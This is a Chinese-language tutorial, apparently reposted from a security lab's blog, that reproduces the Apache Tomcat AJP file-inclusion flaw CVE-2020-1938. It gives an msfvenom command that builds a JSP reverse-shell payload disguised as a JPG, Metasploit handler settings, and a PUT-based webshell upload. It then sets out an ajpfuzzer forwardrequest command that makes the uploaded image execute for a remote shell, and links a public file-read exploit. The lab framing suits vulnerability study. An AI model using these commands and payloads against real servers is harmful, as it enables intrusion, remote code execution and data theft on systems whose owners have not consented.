一、漏洞背景2020年02月20日，國家信息安全漏洞共享平臺(CNVD)發(fā)布了關于Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487)的安全公告。Tomcat作為一款免費開源輕量級的web應用服務器，廣泛應用于并發(fā)量不是很高的場合，Tomact默認端口8080用于處理http請求，Tomcat會監(jiān)聽AJP連接器的8009端口，用于與其他Web服務器通過AJP協(xié)議進行交互，由于Tomcat AJP協(xié)議存在設計缺陷，攻擊者可構造特定的payload讀取服務器WEB目錄下的任意文件以及可以包含任意文件，若存在上傳點，可以獲取shell，進一步進行遠程代碼執(zhí)行。二、影響版本Apache Tomcat 6Apache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0.31三、漏洞復現(xiàn)這里為了更加直觀方便的復現(xiàn)CVE-2020-1938，采用WindowsServer + Apache Tomcat 8.5.19環(huán)境。1、搭建環(huán)境首先上官網(wǎng)下載Apache Tomcat 8.5.19，當然別忘了JAVA。https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.19/下載完直接放在服務器任意文件夾，在bin目錄開啟Tomcat，其實瀏覽器打開默認端口8080就行，看到熟悉的Tomcat界面說明那就是OK的。2、msf生成反彈木馬用msf生成一個jsp反彈木馬。這里為了更方便接近生產(chǎn)環(huán)境我們直接生成一個圖片馬兒。msfvenom?-p?java/jsp_shell_reverse_tcp?LHOST=本機IP?LPORT=監(jiān)聽端口?R?>muma.jpgOK，已經(jīng)生成了一個文件名為muma.jpg的圖片木馬。接下來我們利用一下metasploit中的exploit/multi/handler后門模塊進行攻擊。監(jiān)聽use exploit/multi/handlerset payload java/jsp_shell_reverse_tcpset lhost 本機IPset lport 監(jiān)聽端口3、任意文件上傳這里我們順便就用Apache Tomcat 8.5.19來做一個任意文件上傳漏洞的復現(xiàn)，在服務器上修改配置文件/conf/web.xml，允許tomcat用PUT方式提交，使其產(chǎn)生一個任意文件上傳的漏洞，不多說，自行腦補CVE-2017-12615。修改tomcat配置文件/conf/web.xml，添加readonly參數(shù)，屬性改為false。抓取tomcat頁面數(shù)據(jù)包，修改提交方式為PUT，構造payload，上傳webshell訪問一下這個webshell就可以遠程執(zhí)行任意命令了，當然，如果權限不足的話還得提權，這里就不做演示了。4、反彈shell回到正題(接第2篇)假設說某個運行在該版本tomcat上的業(yè)務有個上傳點，我們在上傳目錄upload上傳了我們剛才生成的反彈圖片馬。下載一個AJP包構造器ajpfuzzer_v0.6.jarURL：https://github.com/doyensec/ajpfuzzer/releases運行java -jarajpfuzzer_v0.6.jar執(zhí)行connect 目標ip 8009連接目標端口java -jar ajpfuzzer_v0.6.jarconnect 目標IP 8009執(zhí)行下面命令構造并發(fā)送AJP包，其中/upload/muma.jpg為上傳的木馬路徑，其中ma.jsp可以換為任意該web項目中沒有的jsp文件，這樣tomcat才會去調(diào)用DefaultServlet.forwardrequest 2 "HTTP/1.1" "/ma.jsp" 192.168.194.133 192.168.194.133 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:ma.jsp","javax.servlet.include.path_info:/upload/muma.jpg","javax.servlet.include.servlet_path:/"請求發(fā)送成功后，ma.jpg被當做jsp解析，成功拿到shell5、Tomcat Ajp協(xié)議文件讀取漏洞用大佬寫的EXP直接任意文件讀取https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

---

KillBoy安全實驗室回歸技術本質(zhì)，引領實戰(zhàn)潮流

總結

以上是生活随笔為你收集整理的tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。